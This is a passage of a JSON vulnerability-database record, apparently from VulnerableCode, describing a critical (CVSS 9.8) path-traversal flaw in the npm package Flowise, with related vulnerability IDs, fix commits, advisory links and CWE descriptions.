4-ykep"},{"vulnerability":"VCID-6ufs-d346-d7ev"},{"vulnerability":"VCID-6wat-8akx-hycz"},{"vulnerability":"VCID-71uq-yx2j-cqak"},{"vulnerability":"VCID-8vsg-mxay-gkf7"},{"vulnerability":"VCID-9bht-svq8-87b4"},{"vulnerability":"VCID-9rqv-p7rz-5kar"},{"vulnerability":"VCID-a1e4-f5dh-w3a5"},{"vulnerability":"VCID-abyp-yn76-1yfp"},{"vulnerability":"VCID-affy-v76q-fub6"},{"vulnerability":"VCID-aqg8-6us7-uqef"},{"vulnerability":"VCID-b97u-efzx-dffn"},{"vulnerability":"VCID-bkmk-k9mn-ekhx"},{"vulnerability":"VCID-cb6d-4c2v-w7c3"},{"vulnerability":"VCID-cxja-9yxc-k7au"},{"vulnerability":"VCID-d4wa-szeh-43ab"},{"vulnerability":"VCID-dtss-epth-z7fh"},{"vulnerability":"VCID-dzed-27rk-3qav"},{"vulnerability":"VCID-e65e-s5sd-kuhp"},{"vulnerability":"VCID-ejdc-j73x-jydk"},{"vulnerability":"VCID-fje6-knjc-nfgf"},{"vulnerability":"VCID-fu6t-9dk4-jbh9"},{"vulnerability":"VCID-g7y6-euhd-jqhh"},{"vulnerability":"VCID-gt6n-beak-33gy"},{"vulnerability":"VCID-gvpx-4wkw-43cz"},{"vulnerability":"VCID-hdej-umwh-kqav"},{"vulnerability":"VCID-hkfs-v3bp-kbh5"},{"vulnerability":"VCID-j5hh-haj2-qydg"},{"vulnerability":"VCID-jcze-eg2c-mkcf"},{"vulnerability":"VCID-jmps-anck-eqdt"},{"vulnerability":"VCID-k579-xd81-hqdu"},{"vulnerability":"VCID-kpyg-gve3-b3av"},{"vulnerability":"VCID-ksmv-s6c9-t7ap"},{"vulnerability":"VCID-m3j3-4u39-euht"},{"vulnerability":"VCID-n77p-4nu7-2yb4"},{"vulnerability":"VCID-pg5c-6y4s-h3cq"},{"vulnerability":"VCID-pzza-9xq9-a7de"},{"vulnerability":"VCID-qgs1-hazv-67b8"},{"vulnerability":"VCID-qm89-q2ar-uyhy"},{"vulnerability":"VCID-r74e-k86f-7qgb"},{"vulnerability":"VCID-rgmv-6bqh-eqf2"},{"vulnerability":"VCID-s3jg-wce1-fbf3"},{"vulnerability":"VCID-t839-eydz-1ud4"},{"vulnerability":"VCID-tdm1-91mc-8kgr"},{"vulnerability":"VCID-v1nz-wwsu-qycg"},{"vulnerability":"VCID-v9hg-7pex-g3dp"},{"vulnerability":"VCID-w9yr-5jbp-q7fm"},{"vulnerability":"VCID-wt2v-e5sa-n3g8"},{"vulnerability":"VCID-xt1d-efw7-g3c6"},{"vulnerability":"VCID-ywgu-76cy-uqe7"},{"vulnerability":"VCID-z1y2-f2w
s-8ycb"},{"vulnerability":"VCID-zbrd-qdty-2bfs"},{"vulnerability":"VCID-zwna-stj5-3yhm"},{"vulnerability":"VCID-zwz7-byj4-6qan"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/flowise@3.0.5"}],"references":[{"reference_url":"https://github.com/FlowiseAI/Flowise/commit/8bd3de41533de78e4ef6c980e5704a1f9cb7ae6f","reference_id":"","reference_type":"","scores":[{"value":"9.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/FlowiseAI/Flowise/commit/8bd3de41533de78e4ef6c980e5704a1f9cb7ae6f"},{"reference_url":"https://github.com/FlowiseAI/Flowise/commit/c2b830f279e454e8b758da441016b2234f220ac7","reference_id":"","reference_type":"","scores":[{"value":"9.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/FlowiseAI/Flowise/commit/c2b830f279e454e8b758da441016b2234f220ac7"},{"reference_url":"https://github.com/FlowiseAI/Flowise/security/advisories/GHSA-q67q-549q-p849","reference_id":"","reference_type":"","scores":[{"value":"9.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"},{"value":"CRITICAL","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/FlowiseAI/Flowise/security/advisories/GHSA-q67q-549q-p849"},{"reference_url":"https://github.com/advisories/GHSA-q67q-549q-p849","reference_id":"GHSA-q67q-549q-p849","reference_type":"","scores":[{"value":"CRITICAL","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-q67q-549q-p849"}],"weaknesses":[{"cwe_id":22,"name":"Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')","description":"The 
product uses external input to construct a pathname that is intended to identify a file or directory that is located underneath a restricted parent directory, but the product does not properly neutralize special elements within the pathname that can cause the pathname to resolve to a location that is outside of the restricted directory."},{"cwe_id":937,"name":"OWASP Top Ten 2013 Category A9 - Using Components with Known Vulnerabilities","description":"Weaknesses in this category are related to the A9 category in the OWASP Top Ten 2013."},{"cwe_id":1035,"name":"OWASP Top Ten 2017 Category A9 - Using Components with Known Vulnerabilities","description":"Weaknesses in this category are related to the A9 category in the OWASP Top Ten 2017."}],"exploits":[],"severity_range_score":"9.0 - 10.0","exploitability":"0.5","weighted_severity":"9.0","risk_score":4.5,"resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-g7y6-euhd-jqhh"}